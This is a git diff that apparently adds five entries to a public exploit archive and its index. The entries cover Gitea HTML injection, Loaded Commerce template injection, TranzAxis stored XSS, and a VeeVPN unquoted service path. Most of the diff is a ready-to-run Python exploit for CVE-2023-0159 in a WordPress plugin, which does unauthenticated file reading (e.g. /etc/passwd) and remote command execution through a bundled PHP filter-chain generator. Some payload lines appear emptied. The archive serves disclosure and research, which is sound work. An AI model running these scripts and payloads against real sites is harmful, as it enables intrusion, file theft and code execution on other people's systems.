diff --git a/exploits/multiple/webapps/52087.txt b/exploits/multiple/webapps/52087.txt
new file mode 100644
index 000000000..c56ca9c53
--- /dev/null
+++ b/exploits/multiple/webapps/52087.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Gitea 1.24.0 - HTML Injection
+# Date: 2025-03-09
+# Exploit Author: Mikail KOCADAĞ
+# Vendor Homepage: https://gitea.com
+# Software Link: https://dl.gitea.io/gitea/1.24.0/
+# Version: 1.24.0
+# Tested on: Windows 10, Linux Ubuntu 22.04
+# CVE : N/A
+
+## Vulnerability Description:
+In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability.
+
+## Exploit PoC:
+[https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz][https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz]
+
+## Paload:
deneme
+### **1. Request:**
+POST /user/settings HTTP/2
+Host: demo.gitea.com
+Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
+Content-Length: 312
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Accept-Language: tr-TR,tr;q=0.9
+Origin: null
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Priority: u=0, i
+
+_csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
+&full_name=Abuzettin
+&description=%3Ch1%3Edeneme%3C%2Fh1%3E
+&website=
+&location=
+&visibility=0
+&keep_email_private=on
\ No newline at end of file
diff --git a/exploits/php/webapps/52084.txt b/exploits/php/webapps/52084.txt
new file mode 100644
index 000000000..2e9933da3
--- /dev/null
+++ b/exploits/php/webapps/52084.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI)
+# Date: 03/13/2025
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://loadedcommerce.com/
+# Version: 6.6
+# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
+
+Injecting {{7*7}} into the search parameter
+https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
+returns 49, confirming a template injection vulnerability.
+
+Forgot Password:
+Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
+https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
+triggers an alert, demonstrating client-side code execution.
\ No newline at end of file
diff --git a/exploits/php/webapps/52085.py b/exploits/php/webapps/52085.py
new file mode 100755
index 000000000..0328b4f83
--- /dev/null
+++ b/exploits/php/webapps/52085.py
@@ -0,0 +1,249 @@
+# Exploit Title: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
+# Date: 12 march 2025
+# Exploit Author: Ravina
+# Vendor Homepage: wprealize
+# Version: 1.9.1
+# Tested on: windows, linux
+# CVE ID : CVE-2023-0159
+# Vulnerability Type: Remote Code Execution
+
+------------------------------------------------
+# CVE-2023-0159_scan.py
+
+#!/usr/bin/env python3
+# LFI: ./exploit.py --mode lfi --target https://vuln-site.com --file /etc/passwd
+# RCE: ./exploit.py --mode rce --target https://vuln-site.com --command "id" --generator /path/to/php_filter_chain_generator.py
+
+import argparse
+import requests
+import base64
+import subprocess
+import time
+import php_filter_chain_generator
+
+def run_lfi(target, file_path):
+ url = f"{target}/wp-admin/admin-ajax.php"
+ payload = {
+ 'action': 'extensive_vc_init_shortcode_pagination',
+ 'options[template]': f'php://filter/convert.base64-encode/resource={file_path}'
+ }
+
+ try:
+ response = requests.post(url, data=payload)
+ if response.status_code == 200 and '{"status":"success","message":"Items are loaded","data":' in response.text:
+ try:
+ json_data = response.json()
+ base64_content = json_data['data']['items']
+ decoded = base64.b64decode(base64_content).decode()
+ print(f"\n[+] Successfully read {file_path}:\n")
+ print(decoded)
+ except Exception as e:
+ print(f"[-] Decoding failed: {str(e)}")
+ print(f"Raw response (truncated): {response.text[:500]}...")
+ else:
+ print(f"[-] LFI failed (Status: {response.status_code})")
+ except Exception as e:
+ print(f"[-] Request failed: {str(e)}")
+
+def run_rce(target, command, generator_path):
+ # Base64 encode command to handle special characters
+ encoded_cmd = base64.b64encode(command.encode()).decode()
+ php_code = f''
+
+ # Generate filter chain
+ try:
+ result = subprocess.run(
+ [generator_path, '--chain', php_code],
+ capture_output=True,
+ text=True,
+ check=True
+ )
+ payload = None
+ for line in result.stdout.split('\n'):
+ if line.startswith('php://filter'):
+ payload = line.strip()
+ break
+
+ if not payload:
+ print("[-] Failed to generate payload")
+ return
+
+ url = f"{target}/wp-admin/admin-ajax.php"
+ data = {'action': 'extensive_vc_init_shortcode_pagination', 'options[template]': payload}
+
+ print(f"[*] Sending payload for command: {command}")
+ start_time = time.time()
+ # Send the request to attempt RCE and dont forget to pass the generator path
+ response = requests.post(url, data=data)
+ elapsed = time.time() - start_time
+
+ print(f"\n[+] Response time: {elapsed:.2f} seconds")
+ print(f"[+] Status code: {response.status_code}")
+
+ if response.status_code == 200:
+ print("\n[+] Response content:")
+ print(response.text[:1000] + ("..." if len(response.text) > 1000 else ""))
+
+ except subprocess.CalledProcessError as e:
+ print(f"[-] Filter chain generator failed: {e.stderr}")
+ except FileNotFoundError:
+ print(f"[-] Generator not found at {generator_path}")
+ except Exception as e:
+ print(f"[-] RCE failed: {str(e)}")
+
+def main():
+ parser = argparse.ArgumentParser(description="CVE-2023-0159 Exploit Script")
+ parser.add_argument("--mode", choices=["lfi", "rce"], required=True, help="Exploit mode")
+ parser.add_argument("--target", required=True, help="Target URL (e.g., https://example.com)")
+ parser.add_argument("--file", help="File path for LFI mode")
+ parser.add_argument("--command", help="Command to execute for RCE mode")
+ parser.add_argument("--generator", default="php_filter_chain_generator.py",
+ help="Path to php_filter_chain_generator.py")
+
+ args = parser.parse_args()
+
+ if args.mode == "lfi":
+ if not args.file:
+ print("[-] Missing --file argument for LFI mode")
+ return
+ run_lfi(args.target.rstrip('/'), args.file)
+ elif args.mode == "rce":
+ if not args.command:
+ print("[-] Missing --command argument for RCE mode")
+ return
+ run_rce(args.target.rstrip('/'), args.command, args.generator)
+
+if __name__ == "__main__":
+ main()
+
+------------------------------------------
+
+# php_filter_chain_generator.py
+
+#!/usr/bin/env python3
+import argparse
+import base64
+import re
+
+
+# No need to guess a valid filename anymore
+file_to_use = "php://temp"
+
+conversions = {
+ '0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
+ '1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
+ '2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
+ '3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
+ '4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
+ '5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
+ '6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
+ '7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
+ '8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+ '9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
+ 'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
+ 'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
+ 'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
+ 'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
+ 'C': 'convert.iconv.UTF8.CSISO2022KR',
+ 'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
+ 'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
+ 'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
+ 'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
+ 'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
+ 'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
+ 'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
+ 'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
+ 'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
+ 'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
+ 'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
+ 'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
+ 'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
+ 'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
+ 'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
+ 'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
+ 'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
+ 'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
+ 'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
+ 'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
+ 'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
+ 'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
+ 'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
+ 'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
+ 'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
+ 'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
+ 'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
+ 'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
+ 'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
+ 'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
+ 'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
+ 'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
+ 's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
+ 'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
+ 't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
+ 'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
+ 'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
+ 'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
+ 'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
+ 'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
+ 'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
+ 'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
+ 'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
+ 'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
+ 'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
+ 'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
+ 'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
+ '/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
+ '+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
+ '=': ''
+}
+
+def generate_filter_chain(chain, debug_base64 = False):
+
+ encoded_chain = chain
+ # generate some garbage base64
+ filters = "convert.iconv.UTF8.CSISO2022KR|"
+ filters += "convert.base64-encode|"
+ # make sure to get rid of any equal signs in both the string we just generated and the rest of the file
+ filters += "convert.iconv.UTF8.UTF7|"
+
+
+ for c in encoded_chain[::-1]:
+ filters += conversions[c] + "|"
+ # decode and reencode to get rid of everything that isn't valid base64
+ filters += "convert.base64-decode|"
+ filters += "convert.base64-encode|"
+ # get rid of equal signs
+ filters += "convert.iconv.UTF8.UTF7|"
+ if not debug_base64:
+ # don't add the decode while debugging chains
+ filters += "convert.base64-decode"
+
+ final_payload = f"php://filter/{filters}/resource={file_to_use}"
+ return final_payload
+
+def main():
+
+ # Parsing command line arguments
+ parser = argparse.ArgumentParser(description="PHP filter chain generator.")
+
+ parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False)
+ parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False)
+ args = parser.parse_args()
+ if args.chain is not None:
+ chain = args.chain.encode('utf-8')
+ base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
+ chain = generate_filter_chain(base64_value)
+ print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value))
+ print(chain)
+ if args.rawbase64 is not None:
+ rawbase64 = args.rawbase64.replace("=", "")
+ match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
+ if (match):
+ chain = generate_filter_chain(rawbase64, True)
+ print(chain)
+ else:
+ print ("[-] Base64 string required.")
+ exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52086.txt b/exploits/php/webapps/52086.txt
new file mode 100644
index 000000000..54ab2fac8
--- /dev/null
+++ b/exploits/php/webapps/52086.txt
@@ -0,0 +1,19 @@
+Exploit Title: TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)
+Date: 10th, March, 2025
+Exploit Author: ABABANK REDTEAM
+Vendor Homepage: https://compassplustechnologies.com/
+Version: 3.2.41.10.26
+Tested on: Window Server 2016
+
+1. Login to web application
+2. Click on `Entire System` goto `Monitoring` then click on `Terminals
+Monitoring`
+3. Select any name below `Terminals Monitoring` then click on `Open Object
+in Tree`
+4. Select on Filter then supply with any filter name then click `Apply
+Filter`
+5. On the right side select on `Save Settings in Explorer Tree`, on the
+`Enter Explorer Item Title` supply the payload
then click OK.
+
+Payload:
\ No newline at end of file
diff --git a/exploits/windows/local/52088.txt b/exploits/windows/local/52088.txt
new file mode 100644
index 000000000..3a6547c10
--- /dev/null
+++ b/exploits/windows/local/52088.txt
@@ -0,0 +1,31 @@
+# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
+# Date: 2024-12-27
+# Exploit Author: Doğukan Orhan
+# Vendor Homepage: https://veepn.com/
+# Version: 1.6.1
+# Tested on: Windows 10 Pro x64
+
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
+
+#Service Info
+
+C:\Users\PC>sc qc VeePNService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VeePNService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : VeePNService
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 51af04e6b..0057c66bb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11916,6 +11916,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",2022-09-15,samguy,webapps,multiple,,2022-09-15,2023-08-02,1,CVE-2022-30781,,,,,
52077,exploits/multiple/webapps/52077.txt,"Gitea 1.22.0 - Stored XSS",2024-08-28,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-28,2024-08-28,0,,,,,,
+52087,exploits/multiple/webapps/52087.txt,"Gitea 1.24.0 - HTML Injection",2025-03-19,"Mikail KOCADAĞ",webapps,multiple,,2025-03-19,2025-03-19,0,,,,,,
44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html
49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,,
42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
@@ -18291,6 +18292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,,2012-09-05,2015-08-16,1,OSVDB-126531;OSVDB-126530,,,,,https://www.securityfocus.com/bid/55424/info
17321,exploits/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",webapps,php,,2011-05-25,2011-05-25,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,http://www.htbridge.ch/advisory/sql_injection_in_extcalendar_2.html
17562,exploits/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,webapps,php,,2011-07-23,2017-10-20,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,
+52085,exploits/php/webapps/52085.py,"Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)",2025-03-19,Ravina,webapps,php,,2025-03-19,2025-03-19,0,CVE-2023-0159,,,,,
39816,exploits/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,webapps,php,,2016-05-16,2016-05-16,0,CVE-2016-4313,,,,http://www.exploit-db.comeXtplorer_2.1.9.zip,http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
51067,exploits/php/webapps/51067.txt,"eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)",2023-03-27,ErPaciocco,webapps,php,,2023-03-27,2023-03-27,0,,,,,,
7525,exploits/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",webapps,php,,2008-12-18,2017-01-05,1,OSVDB-50915;CVE-2008-6334,,,,,
@@ -22820,6 +22822,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35444,exploits/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,webapps,php,,2011-03-04,2014-12-03,1,,,,,,https://www.securityfocus.com/bid/46829/info
6601,exploits/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Local File Inclusion",2008-09-27,dun,webapps,php,,2008-09-26,2016-12-23,1,OSVDB-48613;CVE-2008-4712,,,,http://www.exploit-db.comLnBlog-0.9.0.zip,
45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,,2018-10-31,2018-10-31,0,,"Cross-Site Scripting (XSS)",,,,
+52084,exploits/php/webapps/52084.txt,"Loaded Commerce 6.6 - Client-Side Template Injection(CSTI)",2025-03-19,tmrswrr,webapps,php,,2025-03-19,2025-03-19,0,,,,,,
34552,exploits/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,webapps,php,,2014-09-08,2014-09-08,0,CVE-2014-5140;OSVDB-111211,,,,,http://breaking.technology/advisories/CVE-2014-5140.txt
48909,exploits/php/webapps/48909.txt,"Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-20,"Akıner Kısa",webapps,php,,2020-10-20,2020-10-20,0,,,,,,
50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",2021-10-08,"Merve Oral",webapps,php,,2021-10-08,2021-10-08,0,,,,,,
@@ -31259,6 +31262,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip,
6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm
8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
+52086,exploits/php/webapps/52086.txt,"TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)",2025-03-19,"ABABANK REDTEAM",webapps,php,,2025-03-19,2025-03-19,0,,,,,,
36175,exploits/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",webapps,php,,2011-09-28,2015-02-25,1,,,,,,https://www.securityfocus.com/bid/49835/info
18213,exploits/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,webapps,php,,2011-12-07,2011-12-14,1,OSVDB-77556,,,,http://www.exploit-db.comtraq-v2.3.zip,
18239,exploits/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,webapps,php,,2011-12-14,2011-12-14,1,OSVDB-77556,"Metasploit Framework (MSF)",,,,
@@ -41948,6 +41952,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31991,exploits/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Local Stack Buffer Overflow",2014-02-28,Provensec,local,windows,,2014-02-28,2014-03-03,1,CVE-2007-2568;OSVDB-36178,,,http://www.exploit-db.com/screenshots/idlt32000/screen-shot-2014-03-03-at-122355.png,http://www.exploit-db.comvcdgear350.zip,
3727,exploits/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,local,windows,,2007-04-12,2016-09-30,1,OSVDB-34968;CVE-2007-2062,,,,http://www.exploit-db.comvcdgear356_050213beta.zip,
19678,exploits/windows/local/19678.c,"VDOLive Player 3.0.2 - Local Buffer Overflow",1999-12-13,UNYUN,local,windows,,1999-12-13,2012-07-08,1,CVE-1999-1007;OSVDB-1164,,,,,https://www.securityfocus.com/bid/872/info
+52088,exploits/windows/local/52088.txt,"VeeVPN 1.6.1 - Unquoted Service Path",2025-03-19,"Doğukan Orhan",local,windows,,2025-03-19,2025-03-19,0,,,,,,
49641,exploits/windows/local/49641.txt,"Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths",2021-03-12,"Mohammed Alshehri",local,windows,,2021-03-12,2021-03-12,0,,,,,,
40582,exploits/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows,,2016-10-19,2016-10-19,0,,,,,,
38095,exploits/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - Local Buffer Overflow (SEH/ToLower() Bypass)",2015-09-07,"Robbie Corley",local,windows,,2015-09-07,2015-09-07,1,OSVDB-127268,,,,,